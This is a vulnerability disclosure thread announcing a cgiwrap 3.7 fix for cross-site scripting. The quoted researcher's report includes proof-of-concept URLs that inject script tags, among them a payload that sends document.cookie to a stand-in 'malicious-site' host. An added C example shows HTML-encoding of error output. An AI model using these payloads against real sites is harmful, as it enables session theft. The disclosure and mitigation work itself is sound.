The following cross-site scripting vulnerability was reported in cgiwrap.
This has just been corrected in version 3.7, which has just been released.

http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz

All error message output is now html encoded to prevent this problem.

-- Nathan

> "TAKAGI, Hiromitsu" wrote:
> >
> > Hi,
> >
> > I found a cross-site scripting vulnerability in CGIWrap. Cookies
> > issued by the server on which CGIWrap is installed can be stolen.
> >
> > Please try to access the following URLs.
> >
> > Confirming the bug:
> > http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
> > http://www.unixtools.org/cgi-bin/cgiwrap/<S>
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>
> >
> > JavaScript code will be executed:
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
> > http://www.unixtools.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>
> >
> > Stealing your Cookies issued by www.unixtools.org, if any:
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
> >
> > <snip>
> >
> > Regards,
> > --
> > Hiromitsu Takagi, Ph.D.
> > National Institute of Advanced Industrial Science and Technology,
> > Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
> > http://www.etl.go.jp/~takagi/
>
> _______________________________________________
> cgiwrap-users mailing list
> [EMAIL PROTECTED]
> http://lists.sourceforge.net/lists/listinfo/cgiwrap-users

--
------------------------------------------------------------
Nathan Neulinger                       EMail: [EMAIL PROTECTED]
University of Missouri - Rolla         Phone: (573) 341-4841
CIS - Systems Programming              Fax: (573) 341-4216
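The fix announced above is to HTML-encode all error message output before it is sent to the browser. The block below is an added example of that mitigation in C (cgiwrap's language); it is not cgiwrap's own code, and the function names `html_encode` and `build_error_page` are hypothetical. It encodes the five HTML-significant characters and shows that a request path such as the `<S>TEST</S>` one from the report reaches the error page only as inert text.

```c
/* Added example (not cgiwrap's own code): HTML-encode untrusted text before
 * it is echoed into an error page, the mitigation the announcement describes.
 * html_encode() and build_error_page() are hypothetical names. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Return a newly allocated copy of `in` with the five HTML-significant
 * characters replaced by entity references. The caller frees the result. */
char *html_encode(const char *in)
{
    size_t len = 0;
    const char *p;

    /* First pass: compute the encoded length. */
    for (p = in; *p; p++) {
        switch (*p) {
        case '&':  len += 5; break; /* &amp;  */
        case '<':  len += 4; break; /* &lt;   */
        case '>':  len += 4; break; /* &gt;   */
        case '"':  len += 6; break; /* &quot; */
        case '\'': len += 5; break; /* &#39;  */
        default:   len += 1; break;
        }
    }

    char *out = malloc(len + 1);
    if (!out)
        return NULL;

    /* Second pass: write the encoded text. */
    char *o = out;
    for (p = in; *p; p++) {
        const char *rep = NULL;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   break;
        }
        if (rep) {
            size_t n = strlen(rep);
            memcpy(o, rep, n);
            o += n;
        } else {
            *o++ = *p;
        }
    }
    *o = '\0';
    return out;
}

/* Build an error page body that mentions the untrusted request path.
 * The raw path is never concatenated into the HTML; only its encoded form is.
 * Returns a newly allocated string the caller frees. */
char *build_error_page(const char *requested_path)
{
    const char *fmt = "<html><body><h1>Error</h1>"
                      "<p>Could not execute: %s</p></body></html>\n";
    char *safe = html_encode(requested_path);
    if (!safe)
        return NULL;
    size_t n = strlen(fmt) + strlen(safe) + 1;
    char *page = malloc(n);
    if (page)
        snprintf(page, n, fmt, safe);
    free(safe);
    return page;
}

int main(void)
{
    /* Constructed input, modelled on the <S>TEST</S> path in the report. */
    const char *path = "/~nneul/<S>TEST</S>";
    char *page = build_error_page(path);
    if (!page)
        return 1;
    fputs(page, stdout);
    free(page);
    return 0;
}
```

Encoding at the output boundary, rather than trying to filter "dangerous" input, is what makes the fix complete: every byte the client controlled is rendered as text no matter which path it took to the error message.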
